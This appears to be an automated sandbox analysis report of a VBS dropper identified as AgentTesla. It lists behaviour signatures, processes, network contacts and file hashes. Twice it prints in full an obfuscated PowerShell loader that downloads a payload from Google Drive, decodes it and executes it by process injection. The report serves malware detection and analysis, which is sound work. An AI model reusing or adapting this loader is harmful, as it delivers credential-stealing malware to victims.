Analysis Overview
SHA256
9aa64f43d090ff657848da74a0c2ea1f3211fa1d88ac3fa603e65d724360a957
Threat Level: Known bad
The file STS_Bunker_00617.vbs was found to be: Known bad.
Malicious Activity Summary
AgentTesla
Blocklisted process makes network request
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Suspicious use of NtCreateThreadExHideFromDebugger
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Command and Scripting Interpreter: PowerShell
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-18 09:36
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-18 09:36
Reported
2024-06-18 09:38
Platform
win7-20240611-en
Max time kernel
147s
Max time network
139s
Command Line
Signatures
AgentTesla
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2756 set thread context of 596 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\STS_Bunker_00617.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -windowstyle 1 "cls;$Scrotums = 1;$Bruta='ring';$Beelzebub='S';Function gigged($Gladden){$Hejsevrkets=$Gladden.Length-$Scrotums;$Maksimumstraffene=$Beelzebub+'ubst'+$Bruta;For( $Subarachnoidean=7;$Subarachnoidean -lt $Hejsevrkets;$Subarachnoidean+=8){$Brandering+=$Gladden.$Maksimumstraffene.Invoke( $Subarachnoidean, $Scrotums);}$Brandering;}function Alcaldes($Allograft){ . ($Afkortersav) ($Allograft);}$Mobilianer=gigged ' GetlinMLegitimo KobberzAkkill iAmadeuslYnkentrlTankrenaInforma/Styrtet5Trlkvin.Program0boy.ele Tinklin(bogudlaWTrykkeri SvmmehnDiskogrd kursisoAnabataw hotinisLejespa SkulptrNVermeskTNuancin comeba1Misdan 0mosel.v.Afklaps0B,kning;M.ggede filmkonW BilagsiSynartenDisinsu6 Ydervg4Cad.ish;Mate ia SengelxCata an6Usasunf4 Tempel;Papirar LycopsirSymmetrve dyson:Electre1 Coron 2Overswe1 T,unch.Afflict0,tivels)Inrig,e PrdispoGKaerligeScourwec InterckSov reioSulphet/Parison2 Wristb0Corn,ra1Skvadre0Unbehel0Be.gqvi1fack.ns0 Flagar1Termins Salg arF .orsttiTeko.perSheik reCoynessfWrongs,oIntercaxM,linge/ Ejendo1 Grinn,2Herutde1 Bldt.a. Jaunti0pachyhe ';$Returgodset=gigged 'SandsynUTamsvinsMyoprote Spiller Udspio-I.rksatAPlayaedgVilj kreGemmatinRe eceitProtohe ';$Hovedindgange=gigged 'Trimpreh P ojektmoonseetOver,lopAbdicers Udsu,e: Gatewo/ nfluer/ReklapsdEfter krOnio.skiFlgesedvU,mgngeeEtheri . LaplangPsykt.roCrabieroJewfishg VilloslCamoudieOceanw .FuscindcInactivoBetul.nmB.landr/ mul,iluPretenccPerikon?InsolubeAlcoholxAppendipRaceforolidokilrDopingdtLagerfo=,alrensd Bilf,boHjortetw ,uadranGodsendlSlvvrdioSees,wsaBittingdSerarh &OnonisviBrsspekdGavlvgg=Slu.bet1JustifiE Gan.hil .etallVgrfter,L S,adsa3SocialvptrinelycBlainsgSvagin,cdM,rsomefFremmanmUnoxidioHenkastM Popk mn witt.dWMakvr.eJSup.ame2Opsmnin- .ariferSlentre9papegjebpneumon- HarpikHPinballe Picks WSprogbat JapygiFR dningCStampubtdeoxi,aZNonio,i5,ibrere_Unscrut ';$Flyvevaabnet=gigged ' Dutch >Ph.toet ';$Afkortersav=gigged 'UnproviiLa inioeLystyacxPrecalc ';$Behagelige='Epithecium';$Krigssituationens = gigged ' tteaareDeclinecDeciduihNymph,noBilleds Camorri%VerrucuaSkurepupSolda,epTalarendMaitresaStandarttitu,eraEjendom% Lycop \FinansiCGenop oy LampwosFolkerotPonziteeNaumac nProgramcReallnshAflusniyMiekelimW andote stoc r.Cytostsa ForberaHallucinpatriar Uddykni&Pry.end& Ko.nek PuslingeMaremmacLekane hTyktarmo galiva Sadleplt.kovbyg ';Alcaldes (gigged ' ransfu$S,uglergAnorectlAgustemoconfuteb mutilaaAnhidrolVari bi: Hygsombunconsiy,emaaregPolkaernSkatkamiF.lmfornRestitugGri,hcrsDknavnerS rkproeTremmefgTangydilNsensabeDissimimSp,inkleFoelgenn HeltaltProbosceGrammatrUnarmednStrm.ore ChagrisLibert,=Virkeli(Guldf,sc tricy mRespittdPenname Dressi/PhysiotcPoin el Hvordan$ O,tpreK Impl,ar Disambi Don.tigSphenopsAmbulansUnthin,iYouthprtSlangetudioptraaUdtolketLikvidei ulfoetoSemifasn SteeraeovergesnIntranssFornrme)Dippene ');Alcaldes (gigged ' Parket$t rottlgForhandlTubfulsoBre dbobHer,kera ReprovlU,demon:ti,blivSAnskaf.pJernsbeeSen.elljSnoretrlEl iptikFactoria Jarid.bEcrufariu viklen ulfilmeThallict agfrertTidtag,e OrganorBalstyrn UnpropeDaybreasamurc.s=produkt$NonexclHskyldfloskyttegvBesk kkeBlas ogd NglelniEks,mennHmskodidCellulogAdfr,svaBov risnKoordingAvisereeFunktio.SquushisAk ariepSpejlgllOxyrhyniTaxamettForraad(Forehol$Tilv,jeF nitchilviderefyunderbuvBadevaneAr.angev Ro.aada Proctoareattirb S,ordrnIsohexyeTerroritAfhu,ni) Xanth. ');Alcaldes (gigged 'Chromop[ forpurNKom ureeRaakuldtInterre..epatomSL.calizeReteachrAffrontvHavnelbiRespecicp.rsonkeSipli.gPBalmorao J.rdvoiGuldfisnForkleltPlanlgnM Udkasta QuinibnSkeforsa eltiekgHysteroeM crolirOvertrk]Angreso:Alalusp:WudvagiSComprize Sc.phocSlappesuSclerotrMrk,ligiHandelst noneluyUndisobPBar iesrChaiseloSan,arat GrundfoLegehusc Oc.locoHyperpelAu,oinf noninfe=spagnuo Designv[UnpieceNpro euce S anestWorkpa...unicidSTushesse Deossic kiddoouCentralrUltima,iGulvtpptLuce.esyGnuerneP ,ubocarHijackeo KolonitHusl,jeoDomingtcMetermaoA,aiterlAfskrmnTbryllupyFranskmpTransube,laceab]Bag.ind: Phon.m:unipolrTJallsudlIsotopys,ompost1Palaeop2Overo.h ');$Hovedindgange=$Spejlkabinetternes[0];$Seducer223= (gigged 'Benaadn$ Tu.vedgBeake.zlUngridhoHanekrobblreb gaAfskedslMi.vsan:f.ntasitPr surmeStratifsReuttert SeriogsSh.lteriOpliverg Se,ncinforskrea Nonoptl Regelf= StopmtNKopierieadminicwFeriebo-FluoromOVo.rloobBadsdirjBrilleneRebbenecLykkelit Ludfat D sertiSdemicriyVandrinsSkri eatBl.delseAandsv m M.ondo. SejlfrNTilendee DraftetStrangu.Renum eWUnionizeKamt.kkbAnsatssCP asoidlCa pereiK rolineOsteoidnGinghamt');$Seducer223+=$bygningsreglementernes[1];Alcaldes ($Seducer223);Alcaldes (gigged ' romeme$PikningtKrigs,jeSpurreysBerndhut komplesAfmejesiFemor,cgPublicenSjlcomiaGibli.il Pickee.Struct.H AshmaneDomest,aTudendedBandaiteAgrodolrSalpe esJydepot[Oliv ri$DaftarpROino hoePrepdmitBogsamluscampinrLev ringFlobprooSyndsfodU.foressVarmep,eGhandictButt.rc]Trosive=D,walki$demoph MFabriksoSynkrotbMoolvieiProton,lSkoleraiSkurkesaKarak,enVerbalieDownstrrUnvola. ');$Lysregulering183=gigged ' ,gbomb$CajussutPerfecteRecensisBedsid tbe olknsrickettiMo.genfgBellmounBeramunamdomtollEjstrup. MachaiDUgestemoPyrophowSkandinnBilledflPrespecoProdu,taUn,arbldLysenehFReaumuriJazz,edlSandhedeObjektk(Tyredes$Sheri tHSi.kesnoVoldsomvNotedeseObtusildUpmounti nviolenTeledusdSpejlengButinfoa Hebre nUnfrolig OmstteeSnowsto, whigov$OfferlaR S,inulo N.nresuNonselegEburniahWo,ennehUligevgoForsideuKkkenmasDispurpe UdtalesForvari)Unp.rce ';$Roughhouses=$bygningsreglementernes[0];Alcaldes (gigged 'Overana$CreedalgIndkrsulFngetreoExcu atbSph.ngoa Hemoprl .hurch:TvrskibUClarisanfrontsoc Ro.anfu Fejl.arMeridiosRawishdiCatchxen larg sgPsychot=Bevari,( hysicT Las.voeFemogtyshakkekdt noreks-GkkensjPGraenseaViceco.t IldspahForklar byplads$DomssagR NordfaoSprjtehuProle ogProletahB,andymhPerspekoTopviewuArm.tols Angol.e Efte,ksprete,d) Termin ');while (!$Uncursing) {Alcaldes (gigged ' Rekt.o$ ,estilgStbeforlfl,gdagoArchsteb LaboraaAdoptiolKrystal:Lo,lygaOUnrot,npCognisilIrrestri Sel.erv Uforsvn,ondekniSi.kerhnFortrolgForme ns Romeos=Fry eli$KnoldentgardwurrTelefonu.lowshoeSili,ot ') ;Alcaldes $Lysregulering183;Alcaldes (gigged 'BatrachSShampontProgramabiklangr.etamertForsorg-DictyosSGrosgralPrjudiceSupersaeSt.machpMucigen Teddedg4Precon, ');Alcaldes (gigged ' Unwave$Negering.yggelilStinashoPe.sonabvi,jestaTerephtlPassan,:PaakldnUHjemka,nStrkbancrestlaguTtskrevrSummetosSkftni,iOmgaaelnAbscissg,rester=Astroph(Dyrek,eT KeelfaeOutd,insDesinfetOctod,c-Possi,lPUncomp,aLoasacetReklamehJournal Gen.pbl$MarplotRSubdir.oModbrplu Diri egUnlashehHoldundhTudkoppo FormasuHemimors FunktieGehngsos Hanker)Silicle ') ;Alcaldes (gigged 'S,rhatu$PugilisgPruderelVicuallo,rigittbSchokkeaTerti.mlPiedtak:hygiejnB wagnerrPolygonaAspargenEuroviscNovatiohD,ostyleRecipierDowieisnEnnoblee Epapop=Mafiam,$,ybdebogFusionslHandlinoFeltworbSmugkr aGluco ilKnoppen:KompottRCostbeneequalsiv Udlg.eoFenacetlPredetau VirtuatOverlbsijustifioTidenden Acat aiAdminisz B,drageInsa iemSanidineGra ddanLykkeskt ,harcusTar squ+Hostile+Fartjsf%Nyintro$ SidehnSElannorpTyrestaeVr.sttej .etninlFouragekForkbsraDesti eb UpturniTagdrypnSprgepae Korsikt Liste,tManualae fgretr Necropn Nonexte TongfisStran i.Udplukkc edpanboPukishnuWago.ern OrganitProg os ') ;$Hovedindgange=$Spejlkabinetternes[$Brancherne];}$Horsiness=315407;$Gaullists=29994;Alcaldes (gigged 'Dazzlin$Skud idgQuestiol Gryde,o Tyvek.bRomanilaBetalinlHumoris:Sedu,itBPremiereJugulard Remol oI.dlyseeAfgassem billotmNokkerteVulca is Dru.he Usleben=Reinars SuperaG St vnieBogs.avtResugg,-SnklodmCStaalvaoDy,efornFriherrt KejsereLon heanPapmlketAdminis Minefie$ EloqueR VandtioRessortu MundhegHjl.efihCa,orizhHemihedotriathluDirektos FjernveopflgnisHyrdebr ');Alcaldes (gigged ' A.jung$Bra,derg edenaglQuizzicoParti,lb KommeraSub roclKildesk:Neu ochl UnactpgUberygttTopsejlrChar lyeu,prosc L,tosol= Avantg Pa.sers[PlagiotSFo djelyBreib.ksReplenitlsgaaeneHolde im Tallin.F.edreuCUndervio MonoounMentionviteaceaeIndtastrFiltrattShahzad]Sprayda:Sigmoid:B.ttedeFCarabinrSkidtero,malgammUndescrBBoligpoaVolontrsAntis oe Hamito6Lionhoo4Das.tbuSFarvebatIndkaldrPigtraaiLutidinnwendykegThunder(Bastard$Pa,tomiBCharadee UheldidOfficieoElinguaeF.rretnm AfsvammBarrac e grnskisEfterk,)Statsho ');Alcaldes (gigged 'Museurt$Iltelegg Postcol,kridteoNonpassbLettilgaMaskottlf,stela:MetalizdBeflattiHumaneimBarbareiS.fetyanS oliatu Oestrat Bab lliHoresrev.onsensiFabrikaz Lo.snieUnhothys Fisker Tilsted= Skippe das rti[ResponsSDrejerey,dminissPl.teryt TillideUbeskytmGamene..S.ndhedTTalvrdieInd ragxforulemt,llotro.aendr fEMicroscnCat dvacRepl kkoBepraykd,ataniciPhenoplnBrakerog Pen,ui]Sandara: Regneb:NavigatAFarmakoSLunte aCSiru,shIneins,pIFedeka .DiacoelGregisteeHenvej.tStudielS llianctMacrotor DedoloiSilde.enAabenragC,ckshu(.rythem$Bagklogl R.ngbig,umultetVentricr IndlaeeVgenssc) Outlop ');Alcaldes (gigged 'P,ecere$Git esvgquasijulKonsuleoLang urb irkulra SammenlIkldtca:R,seredHShrewdya ExplornKaritasdBastku,s,iltypeo Kn.bbem HovedveAfs emmnHumanizeBobsldesBedragesBrudebu=Repenni$ CentradSpottiniAnarkosmLasso.ui schrodn AfhjlpuFlamme tSystemviW,ttishvFortovsiNat naezEuklidseIlkaphosNeutron. UdnyttsUlyksaluDrukmaabTand,ursFolkevatGiftstorRetversi manuranGlyco.igSkraast(M,dsige$OmhandlHCutes.koKo,tunnrHaarbrss Rosa.eiIl.ustrn.akenere Rinsu.sBit oensOutthro,Subvic $DagsproGMutabelaEne.ralu BlodtrlRetmssilDeterm,i Begonis Knowl,tSkf,nins olivil)Goads e ');Alcaldes $Handsomeness;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Cystenchyme.aan && echo t"
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;$Scrotums = 1;$Bruta='ring';$Beelzebub='S';Function gigged($Gladden){$Hejsevrkets=$Gladden.Length-$Scrotums;$Maksimumstraffene=$Beelzebub+'ubst'+$Bruta;For( $Subarachnoidean=7;$Subarachnoidean -lt $Hejsevrkets;$Subarachnoidean+=8){$Brandering+=$Gladden.$Maksimumstraffene.Invoke( $Subarachnoidean, $Scrotums);}$Brandering;}function Alcaldes($Allograft){ . ($Afkortersav) ($Allograft);}$Mobilianer=gigged ' GetlinMLegitimo KobberzAkkill iAmadeuslYnkentrlTankrenaInforma/Styrtet5Trlkvin.Program0boy.ele Tinklin(bogudlaWTrykkeri SvmmehnDiskogrd kursisoAnabataw hotinisLejespa SkulptrNVermeskTNuancin comeba1Misdan 0mosel.v.Afklaps0B,kning;M.ggede filmkonW BilagsiSynartenDisinsu6 Ydervg4Cad.ish;Mate ia SengelxCata an6Usasunf4 Tempel;Papirar LycopsirSymmetrve dyson:Electre1 Coron 2Overswe1 T,unch.Afflict0,tivels)Inrig,e PrdispoGKaerligeScourwec InterckSov reioSulphet/Parison2 Wristb0Corn,ra1Skvadre0Unbehel0Be.gqvi1fack.ns0 Flagar1Termins Salg arF .orsttiTeko.perSheik reCoynessfWrongs,oIntercaxM,linge/ Ejendo1 Grinn,2Herutde1 Bldt.a. Jaunti0pachyhe ';$Returgodset=gigged 'SandsynUTamsvinsMyoprote Spiller Udspio-I.rksatAPlayaedgVilj kreGemmatinRe eceitProtohe ';$Hovedindgange=gigged 'Trimpreh P ojektmoonseetOver,lopAbdicers Udsu,e: Gatewo/ nfluer/ReklapsdEfter krOnio.skiFlgesedvU,mgngeeEtheri . LaplangPsykt.roCrabieroJewfishg VilloslCamoudieOceanw .FuscindcInactivoBetul.nmB.landr/ mul,iluPretenccPerikon?InsolubeAlcoholxAppendipRaceforolidokilrDopingdtLagerfo=,alrensd Bilf,boHjortetw ,uadranGodsendlSlvvrdioSees,wsaBittingdSerarh &OnonisviBrsspekdGavlvgg=Slu.bet1JustifiE Gan.hil .etallVgrfter,L S,adsa3SocialvptrinelycBlainsgSvagin,cdM,rsomefFremmanmUnoxidioHenkastM Popk mn witt.dWMakvr.eJSup.ame2Opsmnin- .ariferSlentre9papegjebpneumon- HarpikHPinballe Picks WSprogbat JapygiFR dningCStampubtdeoxi,aZNonio,i5,ibrere_Unscrut ';$Flyvevaabnet=gigged ' Dutch >Ph.toet ';$Afkortersav=gigged 'UnproviiLa inioeLystyacxPrecalc ';$Behagelige='Epithecium';$Krigssituationens = gigged ' tteaareDeclinecDeciduihNymph,noBilleds Camorri%VerrucuaSkurepupSolda,epTalarendMaitresaStandarttitu,eraEjendom% Lycop \FinansiCGenop oy LampwosFolkerotPonziteeNaumac nProgramcReallnshAflusniyMiekelimW andote stoc r.Cytostsa ForberaHallucinpatriar Uddykni&Pry.end& Ko.nek PuslingeMaremmacLekane hTyktarmo galiva Sadleplt.kovbyg ';Alcaldes (gigged ' ransfu$S,uglergAnorectlAgustemoconfuteb mutilaaAnhidrolVari bi: Hygsombunconsiy,emaaregPolkaernSkatkamiF.lmfornRestitugGri,hcrsDknavnerS rkproeTremmefgTangydilNsensabeDissimimSp,inkleFoelgenn HeltaltProbosceGrammatrUnarmednStrm.ore ChagrisLibert,=Virkeli(Guldf,sc tricy mRespittdPenname Dressi/PhysiotcPoin el Hvordan$ O,tpreK Impl,ar Disambi Don.tigSphenopsAmbulansUnthin,iYouthprtSlangetudioptraaUdtolketLikvidei ulfoetoSemifasn SteeraeovergesnIntranssFornrme)Dippene ');Alcaldes (gigged ' Parket$t rottlgForhandlTubfulsoBre dbobHer,kera ReprovlU,demon:ti,blivSAnskaf.pJernsbeeSen.elljSnoretrlEl iptikFactoria Jarid.bEcrufariu viklen ulfilmeThallict agfrertTidtag,e OrganorBalstyrn UnpropeDaybreasamurc.s=produkt$NonexclHskyldfloskyttegvBesk kkeBlas ogd NglelniEks,mennHmskodidCellulogAdfr,svaBov risnKoordingAvisereeFunktio.SquushisAk ariepSpejlgllOxyrhyniTaxamettForraad(Forehol$Tilv,jeF nitchilviderefyunderbuvBadevaneAr.angev Ro.aada Proctoareattirb S,ordrnIsohexyeTerroritAfhu,ni) Xanth. ');Alcaldes (gigged 'Chromop[ forpurNKom ureeRaakuldtInterre..epatomSL.calizeReteachrAffrontvHavnelbiRespecicp.rsonkeSipli.gPBalmorao J.rdvoiGuldfisnForkleltPlanlgnM Udkasta QuinibnSkeforsa eltiekgHysteroeM crolirOvertrk]Angreso:Alalusp:WudvagiSComprize Sc.phocSlappesuSclerotrMrk,ligiHandelst noneluyUndisobPBar iesrChaiseloSan,arat GrundfoLegehusc Oc.locoHyperpelAu,oinf noninfe=spagnuo Designv[UnpieceNpro euce S anestWorkpa...unicidSTushesse Deossic kiddoouCentralrUltima,iGulvtpptLuce.esyGnuerneP ,ubocarHijackeo KolonitHusl,jeoDomingtcMetermaoA,aiterlAfskrmnTbryllupyFranskmpTransube,laceab]Bag.ind: Phon.m:unipolrTJallsudlIsotopys,ompost1Palaeop2Overo.h ');$Hovedindgange=$Spejlkabinetternes[0];$Seducer223= (gigged 'Benaadn$ Tu.vedgBeake.zlUngridhoHanekrobblreb gaAfskedslMi.vsan:f.ntasitPr surmeStratifsReuttert SeriogsSh.lteriOpliverg Se,ncinforskrea Nonoptl Regelf= StopmtNKopierieadminicwFeriebo-FluoromOVo.rloobBadsdirjBrilleneRebbenecLykkelit Ludfat D sertiSdemicriyVandrinsSkri eatBl.delseAandsv m M.ondo. SejlfrNTilendee DraftetStrangu.Renum eWUnionizeKamt.kkbAnsatssCP asoidlCa pereiK rolineOsteoidnGinghamt');$Seducer223+=$bygningsreglementernes[1];Alcaldes ($Seducer223);Alcaldes (gigged ' romeme$PikningtKrigs,jeSpurreysBerndhut komplesAfmejesiFemor,cgPublicenSjlcomiaGibli.il Pickee.Struct.H AshmaneDomest,aTudendedBandaiteAgrodolrSalpe esJydepot[Oliv ri$DaftarpROino hoePrepdmitBogsamluscampinrLev ringFlobprooSyndsfodU.foressVarmep,eGhandictButt.rc]Trosive=D,walki$demoph MFabriksoSynkrotbMoolvieiProton,lSkoleraiSkurkesaKarak,enVerbalieDownstrrUnvola. ');$Lysregulering183=gigged ' ,gbomb$CajussutPerfecteRecensisBedsid tbe olknsrickettiMo.genfgBellmounBeramunamdomtollEjstrup. MachaiDUgestemoPyrophowSkandinnBilledflPrespecoProdu,taUn,arbldLysenehFReaumuriJazz,edlSandhedeObjektk(Tyredes$Sheri tHSi.kesnoVoldsomvNotedeseObtusildUpmounti nviolenTeledusdSpejlengButinfoa Hebre nUnfrolig OmstteeSnowsto, whigov$OfferlaR S,inulo N.nresuNonselegEburniahWo,ennehUligevgoForsideuKkkenmasDispurpe UdtalesForvari)Unp.rce ';$Roughhouses=$bygningsreglementernes[0];Alcaldes (gigged 'Overana$CreedalgIndkrsulFngetreoExcu atbSph.ngoa Hemoprl .hurch:TvrskibUClarisanfrontsoc Ro.anfu Fejl.arMeridiosRawishdiCatchxen larg sgPsychot=Bevari,( hysicT Las.voeFemogtyshakkekdt noreks-GkkensjPGraenseaViceco.t IldspahForklar byplads$DomssagR NordfaoSprjtehuProle ogProletahB,andymhPerspekoTopviewuArm.tols Angol.e Efte,ksprete,d) Termin ');while (!$Uncursing) {Alcaldes (gigged ' Rekt.o$ ,estilgStbeforlfl,gdagoArchsteb LaboraaAdoptiolKrystal:Lo,lygaOUnrot,npCognisilIrrestri Sel.erv Uforsvn,ondekniSi.kerhnFortrolgForme ns Romeos=Fry eli$KnoldentgardwurrTelefonu.lowshoeSili,ot ') ;Alcaldes $Lysregulering183;Alcaldes (gigged 'BatrachSShampontProgramabiklangr.etamertForsorg-DictyosSGrosgralPrjudiceSupersaeSt.machpMucigen Teddedg4Precon, ');Alcaldes (gigged ' Unwave$Negering.yggelilStinashoPe.sonabvi,jestaTerephtlPassan,:PaakldnUHjemka,nStrkbancrestlaguTtskrevrSummetosSkftni,iOmgaaelnAbscissg,rester=Astroph(Dyrek,eT KeelfaeOutd,insDesinfetOctod,c-Possi,lPUncomp,aLoasacetReklamehJournal Gen.pbl$MarplotRSubdir.oModbrplu Diri egUnlashehHoldundhTudkoppo FormasuHemimors FunktieGehngsos Hanker)Silicle ') ;Alcaldes (gigged 'S,rhatu$PugilisgPruderelVicuallo,rigittbSchokkeaTerti.mlPiedtak:hygiejnB wagnerrPolygonaAspargenEuroviscNovatiohD,ostyleRecipierDowieisnEnnoblee Epapop=Mafiam,$,ybdebogFusionslHandlinoFeltworbSmugkr aGluco ilKnoppen:KompottRCostbeneequalsiv Udlg.eoFenacetlPredetau VirtuatOverlbsijustifioTidenden Acat aiAdminisz B,drageInsa iemSanidineGra ddanLykkeskt ,harcusTar squ+Hostile+Fartjsf%Nyintro$ SidehnSElannorpTyrestaeVr.sttej .etninlFouragekForkbsraDesti eb UpturniTagdrypnSprgepae Korsikt Liste,tManualae fgretr Necropn Nonexte TongfisStran i.Udplukkc edpanboPukishnuWago.ern OrganitProg os ') ;$Hovedindgange=$Spejlkabinetternes[$Brancherne];}$Horsiness=315407;$Gaullists=29994;Alcaldes (gigged 'Dazzlin$Skud idgQuestiol Gryde,o Tyvek.bRomanilaBetalinlHumoris:Sedu,itBPremiereJugulard Remol oI.dlyseeAfgassem billotmNokkerteVulca is Dru.he Usleben=Reinars SuperaG St vnieBogs.avtResugg,-SnklodmCStaalvaoDy,efornFriherrt KejsereLon heanPapmlketAdminis Minefie$ EloqueR VandtioRessortu MundhegHjl.efihCa,orizhHemihedotriathluDirektos FjernveopflgnisHyrdebr ');Alcaldes (gigged ' A.jung$Bra,derg edenaglQuizzicoParti,lb KommeraSub roclKildesk:Neu ochl UnactpgUberygttTopsejlrChar lyeu,prosc L,tosol= Avantg Pa.sers[PlagiotSFo djelyBreib.ksReplenitlsgaaeneHolde im Tallin.F.edreuCUndervio MonoounMentionviteaceaeIndtastrFiltrattShahzad]Sprayda:Sigmoid:B.ttedeFCarabinrSkidtero,malgammUndescrBBoligpoaVolontrsAntis oe Hamito6Lionhoo4Das.tbuSFarvebatIndkaldrPigtraaiLutidinnwendykegThunder(Bastard$Pa,tomiBCharadee UheldidOfficieoElinguaeF.rretnm AfsvammBarrac e grnskisEfterk,)Statsho ');Alcaldes (gigged 'Museurt$Iltelegg Postcol,kridteoNonpassbLettilgaMaskottlf,stela:MetalizdBeflattiHumaneimBarbareiS.fetyanS oliatu Oestrat Bab lliHoresrev.onsensiFabrikaz Lo.snieUnhothys Fisker Tilsted= Skippe das rti[ResponsSDrejerey,dminissPl.teryt TillideUbeskytmGamene..S.ndhedTTalvrdieInd ragxforulemt,llotro.aendr fEMicroscnCat dvacRepl kkoBepraykd,ataniciPhenoplnBrakerog Pen,ui]Sandara: Regneb:NavigatAFarmakoSLunte aCSiru,shIneins,pIFedeka .DiacoelGregisteeHenvej.tStudielS llianctMacrotor DedoloiSilde.enAabenragC,ckshu(.rythem$Bagklogl R.ngbig,umultetVentricr IndlaeeVgenssc) Outlop ');Alcaldes (gigged 'P,ecere$Git esvgquasijulKonsuleoLang urb irkulra SammenlIkldtca:R,seredHShrewdya ExplornKaritasdBastku,s,iltypeo Kn.bbem HovedveAfs emmnHumanizeBobsldesBedragesBrudebu=Repenni$ CentradSpottiniAnarkosmLasso.ui schrodn AfhjlpuFlamme tSystemviW,ttishvFortovsiNat naezEuklidseIlkaphosNeutron. UdnyttsUlyksaluDrukmaabTand,ursFolkevatGiftstorRetversi manuranGlyco.igSkraast(M,dsige$OmhandlHCutes.koKo,tunnrHaarbrss Rosa.eiIl.ustrn.akenere Rinsu.sBit oensOutthro,Subvic $DagsproGMutabelaEne.ralu BlodtrlRetmssilDeterm,i Begonis Knowl,tSkf,nins olivil)Goads e ');Alcaldes $Handsomeness;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Cystenchyme.aan && echo t"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 142.250.187.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 172.217.169.33:443 | drive.usercontent.google.com | tcp |
| GB | 142.250.187.238:443 | drive.google.com | tcp |
| GB | 172.217.169.33:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 104.26.13.205:443 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\Elysee.txt
| MD5 | ba9563f04617a88e57e8c5570fafa1f6 |
| SHA1 | 16ccd5c12c2e93fccb354bf4655f624748cbc1f1 |
| SHA256 | 273e078cfaa142cddf150b1bfc6787fb1db78532c0ab65e1a07b28c6e939c51b |
| SHA512 | e86be586b76800ee0439d496a8529198048d14a5d57134c9569364e4022d9639214ec9f53ba8f7ae1a0c558a65b2539d116c205e7ffb1a5dedbb9b8c0cc5965e |
C:\Users\Admin\AppData\Local\Temp\Elysee.txt
| MD5 | dd21f671dea68ac7cd8bf939d4eeda94 |
| SHA1 | 60680c11f047dfd1f31b6121b98e8acdcc886e6b |
| SHA256 | 408a0fe12e992004153e1a9b7aac32c4e66d9b4841019fcbfb18a8674d709467 |
| SHA512 | e23eeb6927dcf233cb0159d6796c7f793a0de7169cb6ab421610f55d902aca9ab172ff905f61404a54f5d3ef2a97d99562486f9384db592cdf2113b09b4c02e7 |
C:\Users\Admin\AppData\Local\Temp\Elysee.txt
| MD5 | 453dc4b9303e5d379ce631ececb64171 |
| SHA1 | 56e8d3f33a7f615a663b52d6decb6f0137668e52 |
| SHA256 | f1c454f72f9ffdb3448a33937ae1f08624a993614e083a4ef0b2e4c936176bb6 |
